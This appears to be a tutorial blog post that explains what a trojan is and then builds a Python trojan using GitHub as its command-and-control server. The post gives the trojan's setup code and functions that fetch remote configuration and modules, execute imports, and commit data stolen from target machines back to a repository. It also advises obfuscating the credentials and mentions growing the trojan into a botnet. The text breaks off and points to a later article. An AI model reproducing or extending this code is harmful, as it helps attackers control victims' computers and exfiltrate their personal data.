What Is Trojan
In computing, a Trojan horse, or trojan, is any malware which misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.
Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an email attachment disguised to appear not suspicious, (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer. Trojans may allow an attacker to access users’ personal information such as banking information, passwords, or personal identity. It can also delete a user’s files or infect other devices connected to the network. Ransomware attacks are often carried out using a trojan.
Building A GitHub Aware Trojan
Now we’re going to create the main trojan that will suck down configuration options and code to run from GitHub. The first step is to build the necessary code to handle connecting, authenticating, and communicating to the GitHub API.
Let’s start by opening a new file called git_trojan.py and entering the following code:
import json import base64 import sys import time import imp import random import threading import Queue import os from github3 import login trojan_id = "abc" trojan_config = "%s.json" % trojan_id data_path = "data/%s/" % trojan_id trojan_modules=  configured = False task_queue = Queue.Queue()
This is just some simple setup code with the necessary imports, which should keep our overall trojan size relatively small when compiled. I say relatively because most compiled Python binaries using py2exe2 are around 7MB. The only thing to note is the trojan_id variable that uniquely iden- tifies this trojan. If you were to explode this technique out to a full botnet, you’d want the capability to generate trojans, set their ID, automatically create a configuration file that’s pushed to GitHub, and then compile the trojan into an executable. We won’t build a botnet today, though; I’ll let your imagination do the work.
Now let’s put the relevant GitHub code in place.
def connect_to_github(): gh = login(username="yourusername",password="yourpassword") repo = gh.repository("yourusername","yourrepository") branch = repo.branch("master") return gh,repo,branch def get_file_contents(filepath): gh,repo,branch = connect_to_github() tree = branch.commit.commit.tree.recurse() for filename in tree.tree: if filepath in filename.path: print "[*] Found file %s" % filepath blob = repo.blob(filename._json_data['sha']) return blob.content return None def get_trojan_config(): global configured config_json = get_file_contents(trojan_config) config = json.loads(base64.b64decode(config_json)) configured = True for task in config: if task['module'] not in sys.modules: exec("import %s" % task['module']) return config def store_module_result(data): gh,repo,branch = connect_to_github() remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000)) repo.create_file(remote_path,"Commit message",base64.b64encode(data)) return
These four functions represent the core interaction between the trojan and GitHub. The connect_to_github function simply authenticates the user to the repository, and retrieves the current repo and branch objects for use by other functions. Keep in mind that in a real-world scenario, you want to obfuscate this authentication procedure as best as you can. You might also want to think about what each trojan can access in your repository based on access controls so that if your trojan is caught, someone can’t come along and delete all of your retrieved data. The get_file_contents function is responsible for grabbing files from the remote repo and then reading the contents in locally. This is used both for reading configuration options as well as reading module source code. The get_trojan_config function is responsible for retrieving the remote configuration document from the repo so that your trojan knows which modules to run. And the final func- tion store_module_result is used to push any data that you’ve collected on the target machine. Now let’s create an import hack to import remote files from our GitHub repo in next article.